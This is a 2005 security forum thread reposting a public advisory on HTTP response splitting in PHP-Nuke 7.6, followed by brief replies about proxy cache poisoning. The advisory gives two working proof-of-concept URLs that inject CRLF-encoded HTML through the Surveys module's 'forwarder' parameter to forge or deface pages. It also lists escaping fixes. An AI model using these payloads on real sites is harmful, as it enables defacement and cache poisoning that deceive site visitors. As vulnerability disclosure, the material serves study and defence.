|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 71
Members: 0
Total: 71
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Http Response Splitting Vulnerability In PHP-NUKE 7.6 |
|
Posted: Sat Apr 16, 2005 3:14 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Code: |
Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more
at http://www.digitalparadox.org/services.ah
Severity: High
Title: Http Response Splitting Vulnerability In PHP-NUKE 7.6 and below
Date: 15/04/2005
Vendor: Php-Nuke
Vendor Website: http://www.phpnuke.org
Summary: There are, http response splitting vulnerability in php-nuke 7.6 and below.
Proof of Concept Exploits:
MORE DETAILS OF THIS SORT OF BUG CAN BE FOUND AT www.digitalparadox.org/papers.ah
A simple POC can be as follows,
http://localhost/modules.php?name=Surveys&pollID=1&forwarder=%0d%0a%0d%0a%3Chtml%3EHELLO
I AM VULNERABLE TO HTTP RESPONSE SPLITTING%3C/html%3E&voteID=1&voteID=2&voteID=3&voteID=4&voteID=5
A more serious version involving Cross user defacement, cache poisoning and page hijacking
can be,
http://localhost/modules.php?name=Surveys&pollID=1&forwarder=%0d%0a%0d%0a%3Chtml%3E<title>This
is a spoofed site </title> <body bgcolor=black><font size=10 color=blue>
Welcome to my PHP Nuke Website, This is a spoofed page that you are seeing
and can be used for great evils details about which can be read in http://www.digitalparadox.org/papers.ah
Http Response Splitting by Diabolic Crab. </center>
Feel free to contact me about this vulnerablitiy at dcrab {at} hackerscenter [dot]
com<font color=black>%3C/html%3E&voteID=1&voteID=2&voteID=3&voteID=4&voteID=5
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string()
and other functions for input validation before passing user input
to the mysql database, or before echoing data on the screen, would solve these
problems.
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com,
please feel free to contact me regarding
these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/.
Lookout for my soon to come out book on Secure coding with
php.
|
Source: http://www.securityfocus.com/archive/1/396000
|
|
|
|
|
|
|
|
|
Posted: Sun Apr 17, 2005 1:06 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
So this is a proof of concept? |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
Posted: Sun Apr 17, 2005 5:34 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
hum, i never do some POC about HTTP response splitting ,
so i just read a basic theory n it make sense .
but if u want to try it, u need a proxy server to be a victim |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Mon Apr 25, 2005 4:11 pm |
|
|
Dcrab |
Valuable expert |
|
|
Joined: Apr 25, 2005 |
Posts: 7 |
|
|
|
|
|
|
|
Hey,
well actually you dont need a proxy server for http response splitting vulnerabilities,
you can carry out cross user defacement or cross user cache poisoning without one, http://www.digitalparadox.org/papers.ah
Using a proxy server will allow you to target many users by poisoning a proxy cache and thus causing a page forging or defacement. |
|
|
|
|
Posted: Sat Apr 30, 2005 12:18 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
well thx, for remaining me
i forget , if u want this effect will be taken by a big size number of users , so you have to poisoning a proxy server
but u can also poisoning only a user
|
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Sat Apr 30, 2005 12:30 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|